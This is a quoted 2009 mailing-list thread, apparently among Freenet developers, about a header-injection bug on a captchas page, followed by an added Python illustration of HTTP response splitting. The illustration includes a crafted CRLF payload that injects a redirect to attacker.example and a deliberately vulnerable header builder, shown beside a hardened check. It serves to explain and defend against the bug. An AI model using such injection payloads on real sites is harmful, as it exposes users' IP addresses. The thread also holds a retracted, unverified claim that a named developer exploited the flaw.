2009/1/20 Matthew Toseland <toad at amphibian.dyndns.org>:
> On Monday 19 January 2009 19:42, Florent Daignière wrote:
>> * Matthew Toseland <toad at amphibian.dyndns.org> [2009-01-19 13:02:31]:
>>
>> > There were at least:
>> > - A lack of validation on the captchas page which enabled collecting users' IP
>> > addresses. This involved putting newlines into the headers in order to send
>> > extra headers and in particular redirects, and was actively exploited by
>> > nextgens to collect IP addresses.
>>
>> Unless you can prove it that's defamation ;)
>
> Then I retract it ... but I'm fairly sure this bug is exploitable, that's the
> point. :)
Not sure if you are seeing the same problem. The only leak I am aware of is related to HTML injection, which is fixable with a few lines of code. (Which I have never told SomeDude.... If you know any off-the-freenet way to send SomeDude a message, please tell me........... for example: a gpg-encrypted message posted on pastebin?)

Or do you mean something HTTP Request Smuggling-like?
--
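The bug class the thread is arguing about is HTTP response splitting: a caller-controlled value copied into a response header without rejecting CR/LF lets the caller terminate that header and append its own, such as a second Location header that redirects the browser to a host the attacker controls, revealing the browser's IP address. The following is an added illustration of that mechanism and of the check that closes it; it is not Freenet code and does not reproduce the captchas page. The parameter name, the attacker host `attacker.example`, and the payload are all constructed for the example.

```python
# Added example, not code from the original thread or from Freenet.
# Shows how an unvalidated value copied into a response header enables
# header injection, and the check that rejects it.
from urllib.parse import unquote

CRLF = "\r\n"

# Constructed attacker input: a URL-encoded CR LF followed by a second
# Location header.  A server decodes the query parameter before using it.
# The host attacker.example is hypothetical.
PAYLOAD_ENCODED = "/welcome%0d%0aLocation:%20http://attacker.example/log"


def build_response_vulnerable(redirect_target: str) -> str:
    """Vulnerable form: the caller-controlled value goes straight into a header."""
    return (
        "HTTP/1.1 302 Found" + CRLF
        + "Location: " + redirect_target + CRLF
        + "Content-Length: 0" + CRLF
        + CRLF
    )


def is_safe_header_value(value: str) -> bool:
    """Reject CR, LF and every other control character except HTAB.

    Checking only for the two-byte "\\r\\n" sequence is not enough: some
    clients treat a bare LF as a line terminator, so any CR or LF must go.
    """
    return not any((ord(c) < 0x20 and c != "\t") or ord(c) == 0x7F for c in value)


def build_response_hardened(redirect_target: str) -> str:
    """Hardened form: refuse to emit a header value containing control characters."""
    if not is_safe_header_value(redirect_target):
        raise ValueError("refusing to emit control characters in a header value")
    return build_response_vulnerable(redirect_target)


def parse_headers(raw_response: str) -> list[tuple[str, str]]:
    """Minimal header split, as a client would see it: (name, value) pairs after the status line."""
    head, _, _ = raw_response.partition(CRLF + CRLF)
    headers = []
    for line in head.split(CRLF)[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return headers


def location_headers(raw_response: str) -> list[str]:
    """All Location header values a client would parse out of the response."""
    return [v for n, v in parse_headers(raw_response) if n.lower() == "location"]


def demo() -> dict:
    """Run the constructed payload through both forms and report what a client sees."""
    decoded = unquote(PAYLOAD_ENCODED)
    vulnerable = location_headers(build_response_vulnerable(decoded))
    try:
        build_response_hardened(decoded)
        hardened = "emitted"
    except ValueError:
        hardened = "rejected"
    return {"vulnerable_locations": vulnerable, "hardened": hardened}


if __name__ == "__main__":
    print(demo())
```

With the vulnerable builder the client parses two Location headers, and a browser that honours the injected one connects to the attacker's host. The hardened builder raises before any header is written; rejecting the request is preferable to stripping the characters, since silently rewriting the value hides the attack from logs.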